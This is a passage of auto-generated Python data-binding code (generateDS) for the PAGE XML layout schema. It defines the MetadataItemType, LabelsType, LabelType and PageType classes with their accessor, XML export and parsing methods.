return MetadataItemType.subclass(*args_, **kwargs_)
else:
return MetadataItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_value(self):
return self.value
def set_value(self, value):
self.value = value
def get_date(self):
return self.date
def set_date(self, date):
self.date = date
def validate_typeType(self, value):
# Validate type typeType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['author', 'imageProperties', 'processingStep', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on typeType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.Labels
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MetadataItemType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('MetadataItemType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'MetadataItemType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MetadataItemType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MetadataItemType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MetadataItemType'):
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
if self.value is not None and 'value' not in already_processed:
already_processed.add('value')
outfile.write(' value=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.value), input_name='value')), ))
if self.date is not None and 'date' not in already_processed:
already_processed.add('date')
outfile.write(' date="%s"' % self.gds_format_datetime(self.date, input_name='date'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MetadataItemType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_typeType(self.type_) # validate type typeType
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
value = find_attr_value_('value', node)
if value is not None and 'value' not in already_processed:
already_processed.add('value')
self.value = value
value = find_attr_value_('date', node)
if value is not None and 'date' not in already_processed:
already_processed.add('date')
try:
self.date = self.gds_parse_datetime(value)
except ValueError as exp:
raise ValueError('Bad date-time attribute (date): %s' % exp)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
# end class MetadataItemType
class LabelsType(GeneratedsSuper):
"""Reference to external model / ontology / schema
E.g. an RDF resource identifier
(to be used as subject or object of an RDF triple)
Prefix for all labels (e.g. first part of an URI)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('externalModel', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('externalId', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('prefix', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('Label', 'LabelType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Label', 'type': 'LabelType'}, None),
]
subclass = None
superclass = None
def __init__(self, externalModel=None, externalId=None, prefix=None, comments=None, Label=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.externalModel = _cast(None, externalModel)
self.externalModel_nsprefix_ = None
self.externalId = _cast(None, externalId)
self.externalId_nsprefix_ = None
self.prefix = _cast(None, prefix)
self.prefix_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
if Label is None:
self.Label = []
else:
self.Label = Label
self.Label_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, LabelsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if LabelsType.subclass:
return LabelsType.subclass(*args_, **kwargs_)
else:
return LabelsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_Label(self):
return self.Label
def set_Label(self, Label):
self.Label = Label
def add_Label(self, value):
self.Label.append(value)
def insert_Label_at(self, index, value):
self.Label.insert(index, value)
def replace_Label_at(self, index, value):
self.Label[index] = value
def get_externalModel(self):
return self.externalModel
def set_externalModel(self, externalModel):
self.externalModel = externalModel
def get_externalId(self):
return self.externalId
def set_externalId(self, externalId):
self.externalId = externalId
def get_prefix(self):
return self.prefix
def set_prefix(self, prefix):
self.prefix = prefix
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def hasContent_(self):
if (
self.Label
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelsType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('LabelsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'LabelsType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LabelsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LabelsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LabelsType'):
if self.externalModel is not None and 'externalModel' not in already_processed:
already_processed.add('externalModel')
outfile.write(' externalModel=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.externalModel), input_name='externalModel')), ))
if self.externalId is not None and 'externalId' not in already_processed:
already_processed.add('externalId')
outfile.write(' externalId=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.externalId), input_name='externalId')), ))
if self.prefix is not None and 'prefix' not in already_processed:
already_processed.add('prefix')
outfile.write(' prefix=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.prefix), input_name='prefix')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Label_ in self.Label:
namespaceprefix_ = self.Label_nsprefix_ + ':' if (UseCapturedNS_ and self.Label_nsprefix_) else ''
Label_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Label', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('externalModel', node)
if value is not None and 'externalModel' not in already_processed:
already_processed.add('externalModel')
self.externalModel = value
value = find_attr_value_('externalId', node)
if value is not None and 'externalId' not in already_processed:
already_processed.add('externalId')
self.externalId = value
value = find_attr_value_('prefix', node)
if value is not None and 'prefix' not in already_processed:
already_processed.add('prefix')
self.prefix = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'Label':
obj_ = LabelType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Label.append(obj_)
obj_.original_tagname_ = 'Label'
# end class LabelsType
class LabelType(GeneratedsSuper):
"""Semantic label
The label / tag (e.g. 'person').
Can be an RDF resource identifier
(e.g. object of an RDF triple).
Additional information on the label
(e.g. 'YYYY-mm-dd' for a date label).
Can be used as predicate of an RDF triple."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('value', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('type_', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
]
subclass = None
superclass = None
def __init__(self, value=None, type_=None, comments=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.value = _cast(None, value)
self.value_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, LabelType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if LabelType.subclass:
return LabelType.subclass(*args_, **kwargs_)
else:
return LabelType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_value(self):
return self.value
def set_value(self, value):
self.value = value
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('LabelType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'LabelType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LabelType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LabelType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LabelType'):
if self.value is not None and 'value' not in already_processed:
already_processed.add('value')
outfile.write(' value=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.value), input_name='value')), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('value', node)
if value is not None and 'value' not in already_processed:
already_processed.add('value')
self.value = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
pass
# end class LabelType
class PageType(GeneratedsSuper):
"""Contains the image file name including the file extension.
Specifies the width of the image.Specifies the height of the
image.Specifies the image resolution in width.Specifies the image
resolution in height.
Specifies the unit of the resolution information
referring to a standardised unit of measurement
(pixels per inch, pixels per centimeter or other).
For generic use
The angle the rectangle encapsulating the page
(or its Border) has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
(The rotated image can be further referenced
via “AlternativeImage”.)
Range: -179.999,180
The type of the page within the document
(e.g. cover page).
The primary language used in the page
(lower-level definitions override the page-level definition).
The secondary language used in the page
(lower-level definitions override the page-level definition).
The primary script used in the page
(lower-level definitions override the page-level definition).
The secondary script used in the page
(lower-level definitions override the page-level definition).
The direction in which text within lines
should be read (order of words and characters),
in addition to “textLineOrder”
(lower-level definitions override the page-level definition).
The order of text lines within a block,
in addition to “readingDirection”
(lower-level definitions override the page-level definition).
Confidence value for whole page (between 0 and 1)"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('imageFilename', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('imageWidth', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('imageHeight', 'int', 0, 0, {'use': 'required'}),
MemberSpec_('imageXResolution', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('imageYResolution', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('imageResolutionUnit', 'imageResolutionUnitType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:PageTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('textLineOrder', 'pc:TextLineOrderSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Border', 'BorderType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Border', 'type': 'BorderType'}, None),
MemberSpec_('PrintSpace', 'PrintSpaceType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'PrintSpace', 'type': 'PrintSpaceType'}, None),
MemberSpec_('ReadingOrder', 'ReadingOrderType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'ReadingOrder', 'type': 'ReadingOrderType'}, None),
MemberSpec_('Layers', 'LayersType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Layers', 'type': 'LayersType'}, None),
MemberSpec_('Relations', 'RelationsType', 0, 1, {'minOccurs': '0', 'name': 'Relations', 'type': 'RelationsType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
MemberSpec_('TextRegion', 'TextRegionType', 1, 1, {'name': 'TextRegion', 'type': 'TextRegionType'}, 1),
MemberSpec_('ImageRegion', 'ImageRegionType', 1, 1, {'name': 'ImageRegion', 'type': 'ImageRegionType'}, 1),
MemberSpec_('LineDrawingRegion', 'LineDrawingRegionType', 1, 1, {'name': 'LineDrawingRegion', 'type': 'LineDrawingRegionType'}, 1),
MemberSpec_('GraphicRegion', 'GraphicRegionType', 1, 1, {'name': 'GraphicRegion', 'type': 'GraphicRegionType'}, 1),
MemberSpec_('TableRegion', 'TableRegionType', 1, 1, {'name': 'TableRegion', 'type': 'TableRegionType'}, 1),
MemberSpec_('ChartRegion', 'ChartRegionType', 1, 1, {'name': 'ChartRegion', 'type': 'ChartRegionType'}, 1),
MemberSpec_('MapRegion', 'MapRegionType', 1, 1, {'name': 'MapRegion', 'type': 'MapRegionType'}, 1),
MemberSpec_('SeparatorRegion', 'SeparatorRegionType', 1, 1, {'name': 'SeparatorRegion', 'type': 'SeparatorRegionType'}, 1),
MemberSpec_('MathsRegion', 'MathsRegionType', 1, 1, {'name': 'MathsRegion', 'type': 'MathsRegionType'}, 1),
MemberSpec_('ChemRegion', 'ChemRegionType', 1, 1, {'name': 'ChemRegion', 'type': 'ChemRegionType'}, 1),
MemberSpec_('MusicRegion', 'MusicRegionType', 1, 1, {'name': 'MusicRegion', 'type': 'MusicRegionType'}, 1),
MemberSpec_('AdvertRegion', 'AdvertRegionType', 1, 1, {'name': 'AdvertRegion', 'type': 'AdvertRegionType'}, 1),
MemberSpec_('NoiseRegion', 'NoiseRegionType', 1, 1, {'name': 'NoiseRegion', 'type': 'NoiseRegionType'}, 1),
MemberSpec_('UnknownRegion', 'UnknownRegionType', 1, 1, {'name': 'UnknownRegion', 'type': 'UnknownRegionType'}, 1),
MemberSpec_('CustomRegion', 'CustomRegionType', 1, 1, {'name': 'CustomRegion', 'type': 'CustomRegionType'}, 1),
]
subclass = None
superclass = None
def __init__(self, imageFilename=None, imageWidth=None, imageHeight=None, imageXResolution=None, imageYResolution=None, imageResolutionUnit=None, custom=None, orientation=None, type_=None, primaryLanguage=None, secondaryLanguage=None, primaryScript=None, secondaryScript=None, readingDirection=None, textLineOrder=None, conf=None, AlternativeImage=None, Border=None, PrintSpace=None, ReadingOrder=None, Layers=None, Relations=None, TextStyle=None, UserDefined=None, Labels=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, MapRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.imageFilename = _cast(None, imageFilename)
self.imageFilename_nsprefix_ = None
self.imageWidth = _cast(int, imageWidth)
self.imageWidth_nsprefix_ = None
self.imageHeight = _cast(int, imageHeight)
self.imageHeight_nsprefix_ = None
self.imageXResolution = _cast(float, imageXResolution)
self.imageXResolution_nsprefix_ = None
self.imageYResolution = _cast(float, imageYResolution)
self.imageYResolution_nsprefix_ = None
self.imageResolutionUnit = _cast(None, imageResolutionUnit)
self.imageResolutionUnit_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.primaryLanguage = _cast(None, primaryLanguage)
self.primaryLanguage_nsprefix_ = None
self.secondaryLanguage = _cast(None, secondaryLanguage)
self.secondaryLanguage_nsprefix_ = None
self.primaryScript = _cast(None, primaryScript)
self.primaryScript_nsprefix_ = None
self.secondaryScript = _cast(None, secondaryScript)
self.secondaryScript_nsprefix_ = None
self.readingDirection = _cast(None, readingDirection)
self.readingDirection_nsprefix_ = None
self.textLineOrder = _cast(None, textLineOrder)
self.textLineOrder_nsprefix_ = None
self.conf = _cast(float, conf)
self.conf_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Border = Border
self.Border_nsprefix_ = "pc"
self.PrintSpace = PrintSpace
self.PrintSpace_nsprefix_ = "pc"
self.ReadingOrder = ReadingOrder
self.ReadingOrder_nsprefix_ = "pc"
self.Layers = Layers
self.Layers_nsprefix_ = "pc"
self.Relations = Relations
self.Relations_nsprefix_ = "pc"
self.TextStyle = TextStyle
self.TextStyle_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
if TextRegion is None:
self.TextRegion = []
else:
self.TextRegion = TextRegion
self.TextRegion_nsprefix_ = "pc"
if ImageRegion is None:
self.ImageRegion = []
else:
self.ImageRegion = ImageRegion
self.ImageRegion_nsprefix_ = "pc"
if LineDrawingRegion is None:
self.LineDrawingRegion = []
else:
self.LineDrawingRegion = LineDrawingRegion
self.LineDrawingRegion_nsprefix_ = "pc"
if GraphicRegion is None:
self.GraphicRegion = []
else:
self.GraphicRegion = GraphicRegion
self.GraphicRegion_nsprefix_ = "pc"
if TableRegion is None:
self.TableRegion = []
else:
self.TableRegion = TableRegion
self.TableRegion_nsprefix_ = "pc"
if ChartRegion is None:
self.ChartRegion = []
else:
self.ChartRegion = ChartRegion
self.ChartRegion_nsprefix_ = "pc"
if MapRegion is None:
self.MapRegion = []
else:
self.MapRegion = MapRegion
self.MapRegion_nsprefix_ = "pc"
if SeparatorRegion is None:
self.SeparatorRegion = []
else:
self.SeparatorRegion = SeparatorRegion
self.SeparatorRegion_nsprefix_ = "pc"
if MathsRegion is None:
self.MathsRegion = []
else:
self.MathsRegion = MathsRegion
self.MathsRegion_nsprefix_ = "pc"
if ChemRegion is None:
self.ChemRegion = []
else:
self.ChemRegion = ChemRegion
self.ChemRegion_nsprefix_ = "pc"
if MusicRegion is None:
self.MusicRegion = []
else:
self.MusicRegion = MusicRegion
self.MusicRegion_nsprefix_ = "pc"
if AdvertRegion is None:
self.AdvertRegion = []
else:
self.AdvertRegion = AdvertRegion
self.AdvertRegion_nsprefix_ = "pc"
if NoiseRegion is None:
self.NoiseRegion = []
else:
self.NoiseRegion = NoiseRegion
self.NoiseRegion_nsprefix_ = "pc"
if UnknownRegion is None:
self.UnknownRegion = []
else:
self.UnknownRegion = UnknownRegion
self.UnknownRegion_nsprefix_ = "pc"
if CustomRegion is None:
self.CustomRegion = []
else:
self.CustomRegion = CustomRegion
self.CustomRegion_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, PageType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if PageType.subclass:
return PageType.subclass(*args_, **kwargs_)
else:
return PageType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_AlternativeImage(self):
return self.AlternativeImage
def set_AlternativeImage(self, AlternativeImage):
self.AlternativeImage = AlternativeImage
def add_AlternativeImage(self, value):
self.AlternativeImage.append(value)
def insert_AlternativeImage_at(self, index, value):
self.AlternativeImage.insert(index, value)
def replace_AlternativeImage_at(self, index, value):
self.AlternativeImage[index] = value
def get_Border(self):
return self.Border
def set_Border(self, Border):
self.Border = Border
def get_PrintSpace(self):
return self.PrintSpace
def set_PrintSpace(self, PrintSpace):
self.PrintSpace = PrintSpace
def get_ReadingOrder(self):
return self.ReadingOrder
def set_ReadingOrder(self, ReadingOrder):
self.ReadingOrder = ReadingOrder
def get_Layers(self):
return self.Layers
def set_Layers(self, Layers):
self.Layers = Layers
def get_Relations(self):
return self.Relations
def set_Relations(self, Relations):
self.Relations = Relations
def get_TextStyle(self):
return self.TextStyle
def set_TextStyle(self, TextStyle):
self.TextStyle = TextStyle
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_TextRegion(self):
return self.TextRegion
def set_TextRegion(self, TextRegion):
self.TextRegion = TextRegion
def add_TextRegion(self, value):
self.TextRegion.append(value)
def insert_TextRegion_at(self, index, value):
self.TextRegion.insert(index, value)
def replace_TextRegion_at(self, index, value):
self.TextRegion[index] = value
def get_ImageRegion(self):
return self.ImageRegion
def set_ImageRegion(self, ImageRegion):
self.ImageRegion = ImageRegion
def add_ImageRegion(self, value):
self.ImageRegion.append(value)
def insert_ImageRegion_at(self, index, value):
self.ImageRegion.insert(index, value)
def replace_ImageRegion_at(self, index, value):
self.ImageRegion[index] = value
def get_LineDrawingRegion(self):
return self.LineDrawingRegion
def set_LineDrawingRegion(self, LineDrawingRegion):
self.LineDrawingRegion = LineDrawingRegion
def add_LineDrawingRegion(self, value):
self.LineDrawingRegion.append(value)
def insert_LineDrawingRegion_at(self, index, value):
self.LineDrawingRegion.insert(index, value)
def replace_LineDrawingRegion_at(self, index, value):
self.LineDrawingRegion[index] = value
def get_GraphicRegion(self):
return self.GraphicRegion
def set_GraphicRegion(self, GraphicRegion):
self.GraphicRegion = GraphicRegion
def add_GraphicRegion(self, value):
self.GraphicRegion.append(value)
def insert_GraphicRegion_at(self, index, value):
self.GraphicRegion.insert(index, value)
def replace_GraphicRegion_at(self, index, value):
self.GraphicRegion[index] = value
def get_TableRegion(self):
return self.TableRegion
def set_TableRegion(self, TableRegion):
self.TableRegion = TableRegion
def add_TableRegion(self, value):
self.TableRegion.append(value)
def insert_TableRegion_at(self, index, value):
self.TableRegion.insert(index, value)
def replace_TableRegion_at(self, index, value):
self.TableRegion[index] = value
def get_ChartRegion(self):
return self.ChartRegion
def set_ChartRegion(self, ChartRegion):
self.ChartRegion = ChartRegion
def add_ChartRegion(self, value):
self.ChartRegion.append(value)
def insert_ChartRegion_at(self, index, value):
self.ChartRegion.insert(index, value)
def replace_ChartRegion_at(self, index, value):
self.ChartRegion[index] = value
def get_MapRegion(self):
return self.MapRegion
def set_MapRegion(self, MapRegion):
self.MapRegion = MapRegion
def add_MapRegion(self, value):
self.MapRegion.append(value)
def insert_MapRegion_at(self, index, value):
self.MapRegion.insert(index, value)
def replace_MapRegion_at(self, index, value):
self.MapRegion[index] = value
def get_SeparatorRegion(self):
return self.SeparatorRegion
def set_SeparatorRegion(self, SeparatorRegion):
